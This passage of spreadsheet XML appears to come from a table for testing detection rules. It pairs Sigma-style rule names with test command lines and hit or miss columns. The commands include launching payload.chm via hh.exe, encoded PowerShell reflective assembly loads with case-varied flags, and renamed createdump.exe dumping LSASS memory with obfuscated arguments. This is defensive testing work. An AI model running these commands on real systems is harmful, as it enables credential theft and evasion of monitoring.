      <c r="I520" s="43" t="n"/>
      <c r="J520" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C521" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D521" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E521" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I521" s="43" t="n"/>
      <c r="J521" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C522" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D522" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E522" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I522" s="43" t="n"/>
      <c r="J522" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K522" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C523" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D523" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E523" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I523" s="43" t="n"/>
      <c r="J523" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C524" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D524" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E524" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I524" s="43" t="n"/>
      <c r="J524" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C525" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D525" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E525" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I525" s="43" t="n"/>
      <c r="J525" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C526" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D526" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E526" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I526" s="43" t="n"/>
      <c r="J526" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C527" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D527" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E527" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I527" s="43" t="n"/>
      <c r="J527" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C528" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D528" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E528" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I528" s="43" t="n"/>
      <c r="J528" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C529" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D529" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E529" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I529" s="43" t="n"/>
      <c r="J529" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K529" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C530" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D530" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E530" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I530" s="43" t="n"/>
      <c r="J530" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K530" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C531" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D531" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E531" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I531" s="43" t="n"/>
      <c r="J531" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K531" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B532" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C532" s="36" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D532" s="36" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E532" s="36" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "C:\Windows\Temp\srv_task.exe" &amp;&amp; "C:\Windows\Temp\srv_task.exe" "-u" "-f" C:\Users\Public\dotnet-lsass.dump 788</t>
        </is>
      </c>
      <c r="F532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I532" s="43" t="n"/>
      <c r="J532" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K532" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="n"/>
      <c r="B533" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C533" s="36" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D533" s="36" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E533" s="36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F533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I533" s="36" t="n"/>
      <c r="J533" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K533" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="n"/>
      <c r="B534" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C534" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D534" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E534" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -u -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H534" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I534" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J534" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K534" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="n"/>
      <c r="B535" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C535" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D535" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E535" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H535" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I535" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J535" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K535" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="n"/>
      <c r="B536" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C536" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D536" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E536" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G536" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H536" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I536" s="36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J536" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K536" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="n"/>
      <c r="B537" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C537" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D537" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E537" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" /"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H537" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I537" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J537" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K537" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="n"/>
      <c r="B538" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C538" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D538" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E538" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -f C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H538" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I538" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J538" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K538" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="n"/>
      <c r="B539" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C539" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D539" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E539" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F539" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G539" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H539" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I539" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J539" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K539" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="43" t="n"/>
      <c r="B540" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C540" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D540" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E540" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F540" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G540" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H540" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I540" s="43" t="n"/>
      <c r="J540" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K540" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="n"/>
      <c r="B541" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C541" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D541" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E541" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I541" s="43" t="n"/>
      <c r="J541" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K541" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="n"/>
      <c r="B542" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C542" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D542" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E542" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --nAME /TMP/lsAss_dUmp.BIN 632</t>
        </is>
      </c>
      <c r="F542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I542" s="43" t="n"/>
      <c r="J542" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K542" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="n"/>
      <c r="B543" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C543" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D543" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E543" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FUlL --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I543" s="43" t="n"/>
      <c r="J543" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K543" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="n"/>
      <c r="B544" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C544" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D544" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E544" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fULL /"-name" -"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I544" s="43" t="n"/>
      <c r="J544" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K544" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="43" t="n"/>
      <c r="B545" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C545" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D545" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E545" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FuLL /"-name" /tMP/lSaSS_DuMp.bin 632</t>
        </is>
      </c>
      <c r="F545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I545" s="43" t="n"/>
      <c r="J545" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K545" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="43" t="n"/>
